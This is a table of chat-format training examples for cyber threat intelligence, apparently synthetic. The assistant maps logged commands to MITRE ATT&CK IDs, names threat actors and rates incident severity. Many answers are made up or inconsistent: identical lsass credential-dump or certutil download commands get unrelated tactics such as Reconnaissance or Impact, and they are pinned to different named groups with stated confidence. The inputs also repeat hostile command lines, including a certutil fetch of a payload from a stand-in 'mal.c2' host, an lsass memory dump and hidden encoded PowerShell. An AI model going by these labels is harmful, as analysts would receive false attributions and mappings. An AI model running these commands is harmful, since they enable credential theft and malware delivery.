messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidenc... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: LoudMiner can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2498 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-CHPB5UJ5F5)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Persistence",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.194.176.58",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.33.17.48",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0003\"], \"techni... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2528 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2871 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3000 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.173.107.223",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"tech... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.50.60.168",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0003\"], \... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.188.176.78",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"te... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3817 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.58.198.119",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0008\", \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-ITWLAMARD8)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Credential Access, Exfiltration",
"role": "user"
},
{... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1429 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.124.253.54",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0011\", \"TA0001\"]... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.176.208.118",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA00... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may create and cultivate social media accounts that can be used during targeting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1585\", \"T1585.001\"]}",
"rol... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-NWX15DOWCW)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Privilege Escalation, Credential Access",
"role": "user"
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3566 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.120.250.78",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the div... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.92.29.109",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"co... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Several events will then be logged on scheduled task activity, including: Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered; Event ID 4698 on Windows 10, Server 2016 - Scheduled task created;Event... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 821 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2809 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.10.33.79",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: File.txt.exe may render in some views as just File.txt).",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2833 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1720 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.141.74.151",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1098... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.117.221.68",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.118.2.36",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0001\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-2MNQ6DRPHO)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Discovery",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor 2FA/MFA application logs for suspicious events such as rapid login attempts with valid credentials.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1621\"]}",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-XAV6VR3AXN)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: This \"downloaded\" file is actually not dropped onto the system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055\", \"T1055.001\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-VMVUQHM4X2)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Reconnaissance, Defense Evasion",
"role": "user"
},
{
"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidenc... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-8WV6DVOREB)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection, Lateral Movement",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 605 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.19.28.67",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Gold Dragon collects endpoint information using the systeminfo command.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1022 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.134.51.32",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0005... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}",
"role": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-F2C09QRPXE)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance, Exfiltration, Execution",
"role": "user"
},
{
"conte... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for logged domain name system (DNS) data that may buy, lease, or rent infrastructure that can be used during targeting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.103.185.204",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0005\"], \"techni... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-KMNM6JOLRE)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Execution, Reconnaissance, Privilege Escalation",
"role": "user"
},
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-F6E8QJD1L9)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Cri... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.108.144.52",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0005\"], \"techniques\": [\"T1071.001\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \"High\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.47.193.159",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: TYPEFRAME can upload and download files to the victim’s machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3262 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.56.5.175",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-CPKV1XE1FZ)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: PoshC2 contains a module for compressing data using ZIP.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560.001\", \"T1560\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.162.191.144",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0007\"]... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.184.42.67",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0010\", \"TA0040\... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Remsec can add or remove applications or ports on the Windows firewall or disable it entirely.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.004\", \"T1562\"]}",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2080 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.82.244.97",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"te... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-MZ46R6GLJ8)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Credential Access, Impact",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2881 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.134.21.215",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confiden... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Epic encrypts collected data using a public key framework before sending it over the C2 channel.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560\"]}",
"role": "a... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.60.27.148",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confidence\": \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-2KJVEOSQDD)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Command and Control",
"role": "user"
},
{
"content"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-6SVHSBNJVQ)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Reconnaissance",
"role": "user"
},
{
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.5.127.238",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0043\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-RWU1EDDALI)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Credential Access",
"role": "user"
},
{
"cont... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1048 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidenc... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: TeamTNT has used SSH to connect back to victim machines.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: njRAT has executed PowerShell commands via auto-run registry key persistence.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.001\", \"T1059\"]}",
"role": "assis... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: njRAT can launch a command shell interface for executing commands.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.8.192.225",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.100.195.115",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1059.0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1552 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"]... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\",... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.68.217.82",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0010\", \"TA0011\"], \"tec... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.88.123.116",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-9YY6T8MA5X)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence, Execution, Defense Evasion",
"role": "user"
},
{
"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for changes made to windows registry keys and/or values that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.",
"role": "user"
},
{
"conten... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.175.49.142",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: PipeMon modules are stored encrypted on disk.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-4GGILCBCWW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-RA885SJH4O)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.139.75.80",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0040\", \"TA0002\"], ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Silent Librarian has also made use of a variety of URL shorteners for these staged websites.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1608.005\", \"T1608\"]}",
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.182.101.24",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Bankshot gathers domain and account names/information through process monitoring.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1087.002\", \"T1087\", \"T1087.001\"]}",
"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.78.91.208",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0008\", \... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.